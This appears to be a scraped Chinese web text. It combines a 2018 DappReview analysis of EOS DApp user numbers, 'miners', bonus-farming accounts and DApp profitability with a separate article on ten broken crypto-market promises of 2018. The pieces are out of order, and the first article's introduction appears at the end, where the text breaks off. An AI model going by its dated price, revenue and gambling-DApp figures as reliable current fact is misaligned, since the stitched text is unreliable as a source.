在这个盘子中也存在矿工,即所谓的“ DApp 矿工”,指利用工具进行高频游戏而获得大量游戏代币的人群。

下面我们来看看每个 DApp 究竟有多少活跃用户和矿工。 我们按照以下规则定义:

活跃用户定义:11 月与合约发生交互次数 > 30 次

矿工定义:11 月与单个 DApp 合约交互超过 5000 次

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

这是本文中最重要的一张图表,请多花几分钟仔细读一下。

几个结论:

1. 绝大多数 EOS DApp 的 11 月有效活跃用户数不超过 2000,那些总用户超过 1 万的 DApp 其大量的用户主要分成两种:一部分是羊毛党(部分 DApp 有免费投注等活动,被盯上批量薅羊毛);另一部分是刷单用户 。

2. 矿工贡献了 BC 类游戏 70-90% 以上的交易量,而矿工总数约 1400 个地址左右。可以理解为这 1400 个地址占据了整个 EOS DApp 3.5 亿流水中的绝大部分。

3. 唯一的真正游戏—— EOS Knight,是 EOS DApps 中的一股清流,66% 为活跃用户,用户数和活跃占比都是第一,游戏的机制也不存在矿工的概念,可以说是 EOS 上真正的头部游戏类 DApp。

以上就是用户层面的最真实的信息,在惊人的交易量背后,是一副由矿工构建起来的虚假繁荣。对于矿工来说,信仰不重要,赚币(赚钱)是王道。

常见的套路有:

矿工大户冲进某个游戏开启了“核能”矿机,一众散户看到天量分红之后纷纷入场,有的开始挖矿,有的二级市场收货质押等着吃分红,游戏热度在各个群里持续提高,二级市场价格随着参与者进入不断被拉高,而此时大户开始“套利”,即拿出低廉的挖矿成本挖到的代币,用更高的价格在二级市场抛售,甚至直接砸盘。一旦大户砸盘离场之后,分红断崖下跌,二级市场价格雪崩,如果游戏本身在运营上和内容上撑不住的话,基本就废了。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

在某种程度上,矿工有能力套住一批散户,同时加速一个 DApp 的生命周期。当然,打铁还需自身硬,能不能扛得住矿工的压力,在挖矿减半时或者矿工离场时软着陆,要看 DApp 本身的能力。

对于优秀的团队和产品,用户愿意买单,矿工离场意愿相对较低,即使离场也会相对温和。之前的一款游戏 Royal Online Vegas(以下简称 ROV )第一次减半时,很多人等着大户砸盘来低价收货,而实际上竟然没有人砸盘。本质上是因为大部分用户(包括矿工)对于 ROV 的团队的认可以及未来路线图的看好,记得有一次某大户一次 100w 砸盘把二级市场价格砸到几乎腰斩,第二天价格就被买盘拉回原位。

矿工,就如同网游中的打金工作室,以技术手段用低成本获取游戏中的资产,在二级市场上套利获益,他们的存在是一把双刃剑,可以高效盘活游戏内的经济逻辑和效率,也能够以最快的方式对游戏造成毁灭性打击。

1.3 – DApp 羊毛党

说完矿工,来看看羊毛党们的神级骚操作。EOS 上的 15.7 万账户里,有 12 万不活跃的账户,这其中有大量的羊毛党存在,举 2个典型的例子 (下面列出了部分羊毛地址)

仅 pralijing 123 和 z.io 这两位羊毛大户就手持 1.2 万个羊毛地址,他们薅羊毛各有各的偏好,先来看看 pralijing123 同学,他非常喜欢薅 ROV 的羊毛,ROV 有一个小福利就是第一次投注 1 EOS 能获取 50 MEV( ROV 的代币),在此之后每投注 1 EOS 仅有1.5 MEV 左右(挖矿难度一直在提高),利用这一点,pralijing 123 用自己的海量地址去玩第一次投注赚取大量 MEV 代币,以下是几个汇总账户。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

不难看出,这位兄弟是一个武侠爱好者,其羊毛账号有郭襄系列、小昭系列、乔峰系列、林月如系列等等,单从以上这几个小号看,他就已经赚取了超过 1.7 万 MEV 和 300+EOS 的羊毛,其他还有大量账号这里就不做展开了。

另外一位 z.io 更喜欢 BetDice 每天一次的免费抽奖机会

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

有趣的是他所有的收益都汇总到一个账号叫 lueosyangmao (撸 EOS 羊毛),简直不能更直白了……该账号在 11 月 27 号把羊毛账号的收益汇总了一次——总计 1063 EOS,打入自己的 lolfund 12345 账号。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

矿工和羊毛党,一个占到70%+的交易量,一个占到了70%+的用户量,但如果你认可“代码即法律”,那他们的存在即合理。

2 – DApp赚不赚钱?

大量开发者看到了海量交易额和暴富故事,便all in其中,企图分一杯羹,但这钱真的好赚么?

我们用数据来说话。

为了统一计算数字,几个基本假设:

庄家优势( House Edge ) = 2%

考虑 50% 交易量使用了 0.2% 的推荐链接,庄家收益 = 总流水 * ( 2%-0.1% )

70% 收益分红,10% 收益用来 CPU 租赁/市值管理等,20%归项目方,项目方收入 = 庄家收益 * 20%

EOS 价格按照 13 元

注:为简化计算,以下头部 DApp 均按照上述假设中统一参数计算,实际上不同 DApp 的 House Edge在 1.5-4% 之间,分红比例也在 60-80% 不等。所以以下数据仅供参考,并不能够准确的代表实际情况。

按照上述的粗略假设可以看到,第 10 名开外的 DApp 在 11 月所赚的 EOS,按照 12 月 15 日的价格计算还不足 20 万人民币,这点收入不太可能覆盖开发团队的人力、运营广告等费用。当然项目方还有其他的收入:一部分来自于团队解锁的部分代币收到的分红,另一部分也可以在二级市场上出售部分代币套现。但往往良心的团队很少出售套现,反而会选择托盘。

仅有极少数头部 DApp 赚到了钱。DApp 开发者一方面加足马力开发面对日益激烈的存量竞争,另一方面还要提心吊胆地担心黑客入侵,损失的 EOS 动辄数以万计。此外还可能要面临散户维权的压力,着实不易。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

不仅 EOS,波场上的 DApp 同样存在二八效应,头部项目 TRONbet 一骑绝尘,最近几天不断刷新纪录,单日突破了 14 亿波场的交易额( 12 月 15 日),单日分红突破 200 万人民币,按此计算,项目方单日收入在 50-60 万人民币之间。

3 – DApp 的发展历程

无论出发点是什么,最近古典币圈确实普遍认为 DApp 将要爆发。但目前的 DApp 尚不足以被称为“真•风口”,它仅仅是由投机者堆积的假象而已。

作为行业内最早的观察者和评论机构,DappReview认为:目前仅有的爆款,只有去年12月份撬动一池春水的CryptoKitties(加密猫)。 对于缺乏活水的区块链行业而言,评判爆款的唯一衡量标准是它能够带来了多少圈外的增量用户。

7 月份“大火”的 Fomo3D,第一轮总计参与用户不超过 3 万,而 EOS DApp 核心用户仅有将近 4 万,可以断定玩家主要是存量持币用户。加密猫总计拥有超过 20 万 ETH 的地址与合约交互,这其中有大量新创建的地址。

还记得当时我在朋友圈晒了拥有的猫咪后,许多完全不了解加密货币的朋友来咨询怎么买,并跨越了钱包(Metamask)、交易所这些高门槛成为了持币者,并购买了自己的第一只加密猫。

4-6 月是今年 DApp 最火的时期,盛况远超当下。当时国内的三大游戏引擎 Cocos、白鹭、Laya 高调进军区块链,国外厂商Loom、Enjin 频繁曝光新产品,一时间百舸争流。当时,链游行业会议的参与者不乏主流游戏 CP(内容生产商),现在的 DApp大会参与者反而多为钱包、媒体、玩家和行业上下游,有点自己给自己打气的悲凉味道。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

5 月份的 Cocos 开发者沙龙上海站

今年 5 月底 Cocos 上海开发者沙龙上,王哲( Cocos 创始人)跟我说,“别看现在这些区块链游戏开发团队都很积极,80% 最后都会消失”。不过半年,预言就成真了。第一批 DApp 开发者基本都离场了,还有一小部分在坚持,但也是“下海”到 EOS 和 TRON的 BC 类游戏,试图赚一些现金流。

见证了整个过程的我其实内心五味杂陈,眼看他楼起了,当时我见了太多兴奋地开发者,我们讨论是怎么结合区块链更好玩、为什么要上链、技术上哪些要解决。可最近,我却持续收到了不少开发者这样的微信:

“已经没有信仰了”

“没有用户,真的赚不到钱”

“考虑回去做手游出海了”

诸如此类。

我们姑且把这些匆匆入场、匆匆离场的人称为“经典 DApp 圈”(不用古典了,毕竟在我们这那是骂人的)。微信群中“新 DApp圈”的家人们(家人:指一起玩BC类游戏的同伴们),聊天的内容基本围绕着哪个项目现在适合挖矿,挖矿成本多少,哪个项目分红多,什么时候挖矿减半。

围城内外,老韭菜们隐隐担忧这样的玩法不可持续,又一次“新 DApp 圈”的部分资深家人们对 DApp 的形态开始自我怀疑,这样的玩法还能持续多久?下一波真正的 DApp 究竟以什么形式出现?

在游戏类 DApp 真正的爆发之路上依旧有很多瓶颈:

1.公链性能 – ETH 的 tps ,EOS 的 cpu 等机制

2.用户门槛 – 钱包上手、ETH 的交易费、EOS 的 RAM 等机制

3.优秀内容 – 有创意的人生产有价值的内容

而这里面,第一点性能是最不重要的,游戏本身不吃性能,有了高性能的公链也不代表就会有优质的游戏,游戏的核心是在某一个点上做到有意思、好玩,就够了,每天都会出现大量的手机游戏、PC 游戏,只有非常少数需要用到最新的硬件和技术,绝大多数用几年前的电脑照样可以玩,游戏性的核心在于玩法而非性能。

而且即使站在区块链相对理想化的角度,游戏的逻辑也不需要全部上链,也就是对基础设施不会造成那么大的负荷。核心机制上链就足够了,如涉及到资产、安全性、公平性的逻辑和内容。基础设施和应用的发展是一个互相促进的作用,而不是在今天就有人能预见——5年后承载一个 DAU 1 亿的游戏类 DApp 需要什么样的基础链,以及现在就能去实现。

最大的挑战是后面的两点,用户上手的门槛太高和优质内容的缺乏导致整个生态中的用户非常少,依旧是存量持币用户为主,很难吸引到圈外的主流游戏玩家进场。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

区块链之于游戏,只是多了一个我们可以使用的技术和工具,而并不是说过去的游戏就要完蛋了或者全部被颠覆,主机游戏从上世纪 60 年代诞生,时至今日依旧竞争激烈、大作频出,Steam 作为端游的分发巨头根本不需要上市和外部资金支持,桌游这种圈外人看起来很古老、小众的游戏其实早已是一个百亿的市场且还在不断增长。

“区块链游戏”这个名词甚至都是一个伪概念,只是在行业初期,我们用来泛指所有使用了区块链技术的游戏。在最后,这些游戏还是要落地在不同的平台之上。

所以,说区块链能颠覆整个游戏行业?我是不信的,区块链可以改造开发商与玩家之间的协作关系,可以通过引入通证经济和资产代币化增加游戏的经济属性和激励机制,可以让玩家现拥有一个现实世界中实体物品一样的拥有游戏中的虚拟资产(这一点我会后续用单独一篇文章讨论),这些是革新,是优化,不是举着一片大旗否定所有传统游戏。

最终的状态下,对于大部分玩家来说,区块链植入游戏的体验应该是无感的,游戏只要好玩就可以,至于用没用区块链,这不重要。

最近,DappReview 报道了三款正规军的产品,正式发布时间都在 2019 年:

1. 有区块链版炉石之称的 GodsUnchained

Dapp 2.0代表之作——Coinbase布局的卡牌游戏Gods Unchained内测体验

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

2. 由豪华团队游戏老兵组成的 Mythical Games 第一款游戏 Blankos

「区块链游戏不是未来」—— 融了1600万美金的Mythical Games如是说

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

3. 由知名手游公司 Pixowl 开发的区块链游戏平台《沙盒》

「NFT即平台」—— 又一家正规军入场,野心勃勃的区块链版《我的世界》

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

以上这些内容,更注重于游戏性,而仅仅将区块链当做是一个延伸的技术工具,和提供了原生的经济激励机制的实现方式。我更加期待明年这些产品的落地和表现。

4 – DApp 新玩家:波场

除了 EOS 之外,由孙宇晨主导的公链波场( TRON )也是一条聚焦 DApp 赛道的公链。

关于这两条链,有个很有意思的现象:由西方人 BM 开发的 EOS 的用户主要在中国和韩国,亚洲地区为主,而中国人孙宇晨开发的TRON 的用户却受到了海外市场的欢迎。

这可以理解为,本土产品不受本土市场的待见,这事实上是一种偏见。他们的崛起都有其道理,现阶段开发者最迫切的需要只有两点:一是用户,二是资金支持(或能不能赚到钱)。

相比曾经含着金钥匙的几条国产大链的碌碌无为,波场在这两点上面确实夯实了基础工作。

对用户真实性有质疑的,可以去头部游戏 TRONbet 的 telegram  群看一下,至少不输于 EOS 头部 DApp 的活跃程度。

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

在最近跟开发者的接触中,了解到波场已经默默的接触了大量国内外的 DApp 开发者和主流游戏 CP,希望引入更多多元化的内容,而非 BC 类独大。目前正在进行的 DApp 大赛(http://www.tronaccelerator.io/)和波场成立的  1 亿美金区块链游戏基金正蓄势待发。

DappReview 对于任何公链不站队,更倾向于公链用Dapp的数据和内容的丰富性来证明自己。我们从 10 月底开始关注到 TRON上的第一个DApp,并第一个完成对于 TRON Dapp 的数据支持,比 DappRadar 早了近一个月。 通过持续跟踪及观察,虽然我们无法断定波场一定会成功,但至少横向对比其他的空气链可以判断波场在干活。

而在整个区块链行业,即便人人高喊“熊市干活”,可做好本分工作依然一项稀缺品质。

5 – 古典币圈怎么进入 DApp 圈

5.1 – 认知层面

DappReview几篇文章

浅谈你们根本不懂的区块链游戏

—— 5 月份对于区块链游戏的一些思考,很开心地看到当时的不少观点有越来越多的开发者正在落地探索中 。

2018年区块链游戏产业白皮书 – 新的市场 新的机遇

——在ChinaJoy上发布的2018年区块链游戏白皮书,主要是针对上半年ETH上Dapp的总结

80天80亿,寒冬下的暗流涌动——你所不了解的EOS DApp生态大爆发

——8-10月这段时间EOS生态的爆发全解析

5.2 – 数据工具

DappReview网站(https://dapp.review),提供  ETH/EOS/TRON 等主链上全部 DApp 的数据分析,后续我们将支持更多拥有DApp 的主链。

氪金排行榜

https://player.dapp.review

每天查看持币大户玩 DApp 的情况,同时也可以当做自己的一个小账单,搜索自己的地址可以查看玩了哪些 DApp 以及花费多少代币。

5.3 – 钱包

很多币圈的用户持有 EOS 却没有 EOS 钱包和自己的账户,大部分币都放在中心化交易所,包括不少我认识的 Token Fund 投资人甚至都不知道怎么使用 EOS 钱包。

支持 EOS DApp 的钱包 :

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

本图素材取自比特派 DApp 生态链一览图

除了图上钱包之外,还有 BitPortal、EosToken 等也都是支持 EOS DApp 的钱包。

值得一提的是比特派做了些很有意思的尝试,做了 EOS 跨链稳定币的尝试。持有主流区块链资产 BTC、ETH、USDT 的用户可以通过跨链网关把资产兑换为EOS网络上同等数量的跨链资产,用户可以在支持的 DApp 或去中心化交易所中使用这些资产。本质上是希望将持有 BTC、ETH、USDT 的用户可以引导来玩 EOS 的 DApp,还不用担心 EOS 价格的波动。

支持 TRON DApp 的钱包,目前主要有 Cobo 钱包和麦子钱包。

5.4 – 去中心化交易所

在 DApp 的世界里请忘记中心化交易所吧。

中心化交易所类似于现有金融体系中的券商,是通过交易获取 alpha 的场景,也就是炒币。

DEX(去中心化交易所)的存在更像是一个提供换汇服务的场景,我们在 DEX 的使用逻辑是需要用主流币换取 DApp 代币去玩游戏或者质押那分红,或者把游戏代币套现成主流币,用来做二级炒币的需求更低。

目前主流的 EOS DEX 有:

真实月活仅3.7万,矿工横行 —— EOS DApp生态爆发背后的隐患

本图素材取自比特派Dapp生态链一览图

盘点:信誓旦旦的十大「谎言」,正重建一个「独立思考」的区块链世界

曾被预言年底两万五的比特币,势如破竹终于在币价两万美元一周年的前两天,创造了 2018 年的新低;曾被认为有算力保障最安全的 POW 链,也终于在 BCH 算力战中被证明,算力是安全的保障亦是可以颠覆币价的洪水猛兽。

从年中 EOS 主网上线,百万 TPS 梦想破灭开始,币圈那些或显而易见或隐藏深刻的谎言就如同大型车祸现场一般接连翻车。FCoin 靠刷量营造的火爆人气,终究抵不过时间的考验;风靡两个月的击鼓传花游戏 FOMO3D 也难成为区块链上真正的爆款;稳定币 USDT 收割了一批空仓的韭菜;李笑来退出币圈更是成为了口口相传的笑料。

2018,不管是那些长久以来建立起的共识还是被快速捧起的神话,都一个接一个的被轰下了神坛,我们眼见信仰的高楼筑起,又眼见他楼塌了,空气中充满了废墟的味道。回顾这信誓旦旦的十大谎言,是否能为区块链重建一个「独立思考」的平民世界。

一、Tom Lee:「比特币价格年底将超过 2.5 万美元」

2017 年一路高歌猛进的比特币价格在 2018 年将如何发展,一直是分析师们乐于探讨的话题。今年上半年,即使比特币的最大跌幅超过了 62%,也依然有分析师对币价保持乐观。5 月 24 日,华尔街咨询机构 FundstratGlobal Advisors 的联合创始人 Tom Lee 在接受 CNBC 采访时就表示,比特币价格将在 2018 年年底涨到 2.5 万美元。

图片来源:bitinfocharts.com

然而,预言美好现实残酷,比特币价格在今年 4 月份跌破了 7000 之后,就再没涨回过 10000 美元,反而在震荡中不断突破新低。截止出稿,一枚比特币价格最低 3195 美元,相较年初跌去近 82%。

二、BM:「EOS 可达百万 TPS」

2018 年 6 月 2 日,为期 350 天的 EOS ICO 众筹落下帷幕,并最终以 700 万以太币,时值 42 亿美元的总融资额成为史上最大的 ICO。EOS 是币圈名人 BM 的第三个区块链项目,它从诞生之初就以百万级 TPS 为最大卖点。其白皮书中承诺,他们将通过并行式处理等技术,将 EOS 的 TPS 扩展到百万级以上,而在其第二版白皮书中,开发者们甚至提出,通过跨链通讯,EOS 可以实现无限可扩展性。

图片来源:EOS Network Monitor

能不能无限扩容我们姑且不谈,因为当我们还沉浸在对百万吞吐量的憧憬中时,我们就失望地发现,到目前为止 EOS 的最高 TPS 为 3996,距离目标的百万 TPS 只差了 99 万 6004 次而已。

三、张健:「说我割韭菜传销的人都在坐等打脸」

2018 年 5 月 24 日,FT/ETH 交易对上线,Fcoin 平台的「交易即挖矿」计划正式启动。白皮书中规定,总量 100 亿的 FT 代币中的 51% 将通过交易即挖矿的方式逐步分配给用户,同时 Fcoin 还会将收入的 80% 分配给 FT 的持有者,后来该平台还将这一比例提升至 100%。也就是说,Fcoin 会将用户交易过程中支付的手续费,在次日以 FT 的形式返还,并将前一日的全部手续费收入按照用户持有 FT 的比例返还。「交易即挖矿」+「分红机制」开启了投资者们疯狂的刷量模式。

上线 15 天,Fcoin 24 小时交易量达到 288 亿美元,超过了全球排名第二到第七名的交易所的交易量总和;上线 20 天,24 小时交易量达到 500 亿美元。暴涨的交易量推动了平台币 FT 价格的飙升,FT 在几天之内暴涨数百倍。

然而对于异军突起的 Fcoin,币安创始人赵长鹏认为,交易挖矿不但是变相 ICO,而且是高价 ICO,实际上就是资金盘模式。还有投资者向 Fcoin 发来公开信表示:「平台发展初期可能需要交易量,但不能饮鸩止渴,纵容恶意刷单就是在透支未来!」。

面对外界的质疑,Fcoin 创始人张健表示:「说我割韭菜传销的人都在坐等打脸。」

而打脸时刻来的并不算太慢。从七月份开始,Fcoin 返利模式难以为继,开始修改规则,逐渐停止分红,大量曾经疯狂刷单的用户见无利可图转身离去,平台人气骤减,FT 价格严重缩水。即使 Fcoin 企图通过推出锁仓即交易,上线创业板和币改试验区的举措来保住交易量,但却仍然阻止不了 FT 价格一落千丈直至破发的现实,到最后只留下 200 多条公告来见证挖矿即交易的 Fcoin 曾经火过。

四、DApp 排行榜:「FOMO3D 是区块链的爆款应用」

7 月中旬,名为 FOMO3D 的资金盘游戏一时之间成为以太坊区块链上最受欢迎的 DAPP, 24 小时内其用户量上升了 150%,成交量涨了 1500%;短短几天时间,在可见的总投资数量里,就产生了超过 8 万 ETH 的交易单,大约数亿美金的现金流交易。

此游戏的玩法简单粗暴,参与者不断竞价购买平台发行的 key,谁是最后一个竞价的人,并保持 24 小时,谁就可以获得奖池中 48% 的以太币。据 Dappradar 数据显示,在 FOMO3D 游戏最火的时候,其日活用户量过万,日成交量 41215.76ETH,24 小时内以太币资金净流入超过 18 亿。

图片来源:dappradar.com

短期来看,FOMO3D 确实是以太坊区块链上当之无愧的爆款。但爆款 DAPP 总是昙花一现,曾经的加密猫是这样,如今的 FOMO3D 也是这样。8 月之后再看回数据,我们可以发现 FOMO3D 的发展状况直线下降,日活用户量不足百人,日交易量 4ETH 左右。从风靡一时到成为历史,FOMO3D 这场击鼓传花的资金盘游戏只用了不到两个月的时间。

五、Tether:「USDT 是 1:1 挂钩美元的稳定币」

2015 年,Tether 公司推出了锚定美元的加密货币 USDT,Tether 承诺将遵守 1:1 准备金保证,即每一枚 USDT 背后都有 1 美元的资金背书。通常情况下,有实物背书的加密货币价格都趋于稳定,所以它们又被称作是稳定币,可以用来作为投资者的避险工具。目前,USDT 是交易量最大的稳定币。

图片来源:coinmarketcap.com

然而在 2018 年 10 月 15 日,USDT 作为稳定币的不稳定属性暴露无疑。其价格在两小时内暴跌 8%,一些小交易所的跌幅甚至超过 21%,空仓持有 USDT 的投资者怨声载道。曾经熊市中的避险首选如今再也给不了韭菜安全感了。

六、去中心化支持者:「DAPP 就是 APP 的未来」

DAPP 全称 Decentralized Application,翻译成中文就是去中心化应用,相当于是基于区块链系统所创造出来的客户端应用程序(APP)。去年,随着以太坊的普及,以及各种公链项目的迅速发展,币圈开始进入 DAPP 时代。

据 dappradar 数据显示,2017 年底发展起来的以太坊 DAPP 生态到目前为止,已有 1299 个去中心化应用,活跃用户量 249.88 万人;今年 6 月上线主网的 EOS 也已经发展成为当前最活跃的主网和 DAPP 生态,其 DAPP 总量为 209 个,截止 11 月中旬,EOS主网一共有 506310 个 EOS 账号,其中活跃账号占 37%;而前些天转账数量突破 239 万的波场,截止目前的 DAPP 数量为 33 个,其中最受欢迎的 DAPP 日活用户超过 3 万。随着 DAPP 生态的逐渐发展,不少去中心化的信仰者都认为 DAPP 就是 APP 的未来。

博彩类 DAPP 日交易量远高于游戏类

但是,通过对众多 DAPP 的交易量和日活用户数量分析来看,目前的公链还是博彩类 DAPP 的天下。以太坊区块链上 FOMO3D 博彩类游戏的出现,开启了 DAPP 的博彩时代。从已公布的数据可以看出,今年第三季度,以太坊区块链上的博彩类应用成为了所有应用中最大的黑马,其总数超过 111 个,总交易额是游戏类 DAPP 的六倍之多;而在后来者 EOS 和波场中,博彩类游戏更是占据了大部分江山。在 EOS 链上的 209 个 DAPP 当中有 127 个博彩类游戏,占总量的 60.7%,这类游戏也贡献着 90% 以上的交易额;波场主网中的博彩类游戏也占到了 50.2% 左右。

除了博彩赌博类游戏横行之外,DAPP 的发展依然存在不小的困境。首先是应用场景的局限性,基于区块链的 DAPP 应用程序智能在区块链主网当中运行,而当前的公链区块链主网普遍存在扩展性差的问题,从而导致了信息验证时间长,网络拥堵瘫痪的问题,尤其是以太坊;其次,DAPP 应用类型单一,跟风热潮严重,一个爆款游戏往往能够催生数十甚至数百个类似的应用;另外,DAPP 的运行速度过于缓慢,用户活跃度也相对较低,会对 DAPP 的开发带来一定的风险。

所以,要说 DAPP 就是 APP 的未来还为时尚早。

七、李启威:「POW 是保护网络安全的最佳方式」

POW 工作量证明机制是中本聪为保证挖矿公平性而发明出来的,它通过算力竞争来决定记账权的归属。因为有算力保障,POW 链一直以来都被认为是最安全的。2018 年 4 月,莱特币创始人李启威在接受 YouTube 的采访时还表示,对于莱特币和比特币而言,POW 是目前保护网络安全的最佳方式。

但 11 月中旬的一场算力战争则为 POW 链的安全性敲响了警钟。11 月 15 日零点过后,在 BCH 算力战发生前夜,比特币在多个交易平台的价格跌破 6000 美元,创了近一年以来的新低,当天 BCH 跌幅也超过了 18%。16 日,为了应对 BCH 硬分叉而引发的算力战,吴忌寒阵营的 bitcoin.com 矿池开始抽调其在 BTC 链上的算力到 BCH 链上,一小时之内,该矿池在 BTC 链上的算力下降了 48%。

阶段性的算力波动引发了投资者对比特币安全性的担忧,一时之间币价持续下跌。一度被认为是保障区块链安全的算力,此时成了影响币价,威胁公链生死存亡的不定时炸弹。

八、CFTC & SEC 知情人士:「比特币 ETF 几乎肯定会在今年晚些时候获得批准」

今年 7 月份,知名金融新闻网站 zerohedge 发文表示,「比特币 ETF 几乎肯定会在今年晚些时候获得批准。」文中称 SEC 和 CFTC 的相关人士表示:「我认为今年通过比特币 ETF 的概率是 90%。」此前,VanEck / SolidX 曾两度申请比特币 ETF,但均以失败告终。第三次,他们对比特币 ETF 的结构做出了调整,同时 SEC 也表示比特币和以太坊不属于证券,因此外界普遍认为此次申请能够通过的可能性极大。

然而随着熊市的延续,加密货币的市场规模进一步萎缩。2018 年 12 月 7 日,美国证券交易委员会宣布将 VanEck / SolidX 比特币 ETF 的审查期延长至 2019 年 2 月 27 日,这是 SEC 第三次延期。除此之外,今年 8 月 22 日,SEC 就曾以市场规模较小,存在欺诈和市场操纵风险为由拒绝了来自三家不同公司的九个比特币 ETF。11 月末,SEC 主席 Jay Clayton 旧话重提,表示在消除市场操纵问题之前,比特币 ETF 可能无法获得批准。

九、孙宇晨:「预计年底,波场交易量将甩开以太坊一个数量级」

据波场区块链数据显示,该网络转账数于 12 月 1 日达到 239 万笔,四倍于以太坊链上的交易数量。12 月 2 日,波场创始人孙宇晨在微博上表示:「预计到年底,波场(转账数)将甩开以太坊一个量级。」

今年 10 月,波场的 DAPP 生态刚开始起步,在此后不到两个月的时间里,波场 DAPP 数量从 7 个上升到 33 个,交易笔数和交易量也得到了快速的发展,从数据来看,表现亮眼。

但是在大量的交易笔数和交易量背后,暴露出的是波场生态中 DAPP 数量和用户数量的稀缺。目前,在波场的 33 款应用程序中,排名 21 位之后的几乎没有用户和交易量;虽然波场单日转账数突破了 300 万,但是目前其全部 DAPP 的日活加起来还不到 6000,仅占以太坊、EOS、波场三大公链 DAPP 总日活用户的 6.6%。

而从波场主网地址的增长速度和交易笔数的增长速度来看,地址数量的增长速度远低于交易数量的增速;同时,在波场的主网当中,还包括多个地址在短时间内频繁的小额相互转账。据区块链媒体链捕手调查显示,「这很有可能是波场自己开发的自动转账程序生成的。」

十、李笑来:「我准备花几年时间认真转行」

2018 年 9 月 30 日,网红李笑来在微博上郑重其事的发文表示:「从今往后,李笑来个人不会做任何项目投资······我准备花几年时间认真转行。」这被大多数吃瓜群众认为是李笑来老师收割完了韭菜就此退出币圈的宣言。

但早已掌握了如何在币圈快速赚钱的李老师,怎么会轻易离开呢?2018 年 12 月 3 日,「被退出」币圈 42 天的李笑来摇身一变成为了区块链公司雄岸科技的联席 CEO。

图片来源:李笑来微博截图

李笑来的潜台词大抵就是「我要转行」但不代表「我要离开区块链这个趋势潮流」;「我不再做任何项目投资」也不代表「我要退出币圈」;虽然我个人不投资区块链项目了,但我的公司该干嘛还是要干嘛的。

但所谓的「谎言」并不是熊市的专利。2017 年,区块链的浪潮裹挟着大批投机客掀起了全民炒币热,那时曾豪言不会退出 steemit 的 BM 在 17 年年中离开,带着新项目 EOS 继续圈粉;比特大陆用原本只是用来应对用户激活软分叉(UASF)的应急方案在 UASF 暂停后强行分叉出了 BCH;随后打着要抵抗挖矿中心化旗号的比特币黄金靠预挖狠狠地圈了一笔。但彼时根本没人在意谎言的存在,一句话只要能赚钱就行。

而当大潮退去,巨亏 90% 的投资者在币市苦苦挣扎。那些熟读《把时间当做朋友》的李笑来老师的同学们,终于在 2018 年追随着偶像的步伐,赔了个精光;曾在微信群里叫嚷着要 All in 区块链的徐小平,也清空了关于区块链的所有微博,仿佛三点钟无眠区块链社群从来不存在。

其实,这个世界从不缺乏谎言,只是缺少发现谎言的眼睛,或者说有些人已经习惯了做一个装睡者。失去了独立思考的能力。

真实月活仅3.7万,矿工横行:EOS DApp生态爆发背后的隐患

导读

本文是《80天80亿,寒冬下的暗流涌动——你所不了解的EOS DApp生态大爆发》的姊妹篇,在生态爆发之下,存在着部分虚假繁荣的假象。本文将从EOS Dapp的真实用户数讲起,涉及矿工、羊毛党的数据分析,接着延伸到Dapp是否赚钱、过去一年Dapp的发展以及未来的展望、新玩家TRON的崛起以及一份简易的古典币圈入场指南。

在12月1日区块链社区“链金术”举办的Dapp开发者大会上,有人提出了一个新名词——“古典币圈”,泛指币圈内尚且没有接触过Dapp的持币者。

在区块链的语境中,“古典”是嘲讽专用的贬义词。

大约一年前,币圈大佬们扛起区块链大旗向“古典互联网”吹响冲锋号角,Token Fund们也打心眼里瞧不上“古典VC”——成王败寇,谁赚钱谁牛X。那时,Dapp圈才刚刚起步,DappReview还在拿着Excel算加密猫的合成基因。 

如今,币市普跌90%+,币圈大佬们的镰刀虽然锋利依旧,但曾经漫山遍野的韭菜们,连籽都被吃干抹净了。Token Fund(币圈基金)纷纷转做孵化和FA(财务顾问,即帮项目融资),转型卖方,有余粮的基金屈指可数。

迷茫中,大家忽然间想起,好像在这堆空气币之外还有Dapp这么个东西。它,能不能赚钱? 

单单11月又增加了3.5亿的EOS流水

短短数周,集中涌现了几十个Dapp公众号和社群,各大主流币圈媒体争先恐后增设Dapp专区,开展一系列线上线下活动,唯恐错过这漫长寒冬里的一丝微光。 

 Dapp成为风口了吗? 

 Dapp真的火了么?到底有多火? 

本文前半部分是理性客观的数据分析

后半部分是相对感性主观的一些观点

1     EOS Dapp真实用户 

我们先来看看,最具代表性的公链EOS上的Dapp真实用户数据。 

前几天看到一张截图

其中写到11月EOS Dapps的月活有73万地址,然而可笑的是,截止到11月底,EOS主网上总地址数量都没有达到这个数字。若无意外,该统计应该是将每天的活跃用户直接相加得到的月活跃用户。 

那么真正的活跃用户有多少?DappReview根据11月所有活跃Dapp合约的全量交易数据进行计算得到: 

11月活跃Dapp数量:174个

11月Dapp用户总数:15.7万

11月活跃Dapp总流水:3.5亿 EOS

11月Dapp活跃用户总数:3.7万 

此处“活跃用户”的定义为,满足一下条件之一: 

1. 11月与Dapp合约交互次数大于30次

2. 11月与Dapp交易流水大于30 EOS 

1.1 – 头部玩家 

我们先来看看这3.7万活跃用户 

交易流水:超过一半的用户流水小于100 EOS,7%的用户流水大于1万EOS。

使用过的Dapp数量:超过一半用户只体验了不到5款Dapps,有2%的用户是Dapp重度玩家,使用过20款以上。 

其中,头部玩家的数据是非常可怕,前20名头部玩家Dapp流水加起来有8975万EOS,占了11月总流水的26% 。数据可以在DappReview的氪金排行榜 – https://player.dapp.review中查阅。 

在本文开头我们看到,仅11月的交易额已经超过了8-10月的1.5倍,截止到今天,12月刚过去一半,不难判断本月数据将会大幅超越11月。 

上图中12月份氪金排行榜第一名和第二名已经承包了9000万+EOS的流水,超越了11月前20名大户的总和。 下面来看看这两个大户都在玩什么:

排名第一的大户gamblinglife主要在玩BetDice和Big.Game。

